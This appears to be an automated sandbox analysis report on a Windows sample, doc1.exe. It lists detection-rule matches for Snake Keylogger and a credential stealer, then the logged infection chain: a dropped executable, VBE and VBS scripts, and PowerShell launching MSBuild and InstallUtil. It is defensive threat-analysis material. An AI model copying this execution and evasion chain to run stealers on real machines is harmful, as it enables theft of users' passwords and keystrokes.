                  Source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0000001A.00000002.3442953774.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: doc1.exe PID: 6400, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: doc1.exe PID: 6400, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: InstallUtil.exe PID: 5392, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: bosotkm.exe PID: 1864, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: bosotkm.exe PID: 1864, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: bosotkm.exe PID: 1292, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: bosotkm.exe PID: 1292, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: InstallUtil.exe PID: 1596, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: doc1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: bosotkm.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: MSBuild.exe, 00000023.00000002.2865138161.0000000000FB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb=
                  Source: MSBuild.exe, 00000029.00000002.3038923676.00000000013FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbsers\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:r
                  Source: MSBuild.exe, 0000000C.00000002.2458450033.0000000003C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
                  Source: MSBuild.exe, 0000000C.00000002.2458450033.0000000003C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
                  Source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2458450033.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2562731419.000000000154D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2555966193.0000000000FD8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700081075.00000000006F8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2863825564.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038923676.00000000013FF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3036386294.0000000000F58000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
                  Source: MSBuild.exe, 0000000C.00000002.2457220076.0000000000F43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb==
                  Source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb0q
                  Source: MSBuild.exe, 0000000C.00000002.2458450033.0000000003C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *.sln
                  Source: MSBuild.exe, 0000000C.00000002.2458450033.0000000003C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MSBuild MyApp.csproj /t:Clean
                  Source: MSBuild.exe, 0000000C.00000002.2458450033.0000000003C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /ignoreprojectextensions:.sln
                  Source: MSBuild.exe, 00000016.00000002.2558663468.00000000014E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb((^
                  Source: MSBuild.exe, 0000000C.00000002.2458450033.0000000003C99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
                  Source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000ECD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbll
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@59/79@2/4
                  Source: C:\Users\user\Desktop\doc1.exeFile created: C:\Users\user\AppData\Roaming\bosotkm.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6452
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3524:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:120:WilError_03
                  Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2308:120:WilError_03
                  Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2888:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess400
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4016:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5984
                  Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2420
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4896
                  Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2420:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_2116847995
                  Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_03
                  Source: C:\Users\user\Desktop\doc1.exeFile created: C:\Users\user\AppData\Local\Temp\msb.vbeJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\fNUATsLGslepRpn.vbs"
                  Source: doc1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: doc1.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                  Source: C:\Users\user\Desktop\doc1.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                  Source: InstallUtil.exe, 00000004.00000002.3461729638.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002C8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002C57000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002C39000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3472399164.0000000003A9C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3472946076.0000000003C5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002E14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: doc1.exeReversingLabs: Detection: 52%
                  Source: C:\Users\user\Desktop\doc1.exeFile read: C:\Users\user\Desktop\doc1.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\doc1.exe "C:\Users\user\Desktop\doc1.exe"
                  Source: C:\Users\user\Desktop\doc1.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe"
                  Source: C:\Users\user\Desktop\doc1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\fNUATsLGslepRpn.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\bosotkm.exe "C:\Users\user\AppData\Roaming\bosotkm.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 1064
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3508" "2808" "2740" "2812" "0" "0" "2816" "0" "0" "0" "0" "0"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\bosotkm.exe "C:\Users\user\AppData\Roaming\bosotkm.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 1064
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2188" "2800" "2756" "2804" "0" "0" "2808" "0" "0" "0" "0" "0"
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6756" "2872" "2688" "2876" "0" "0" "2880" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
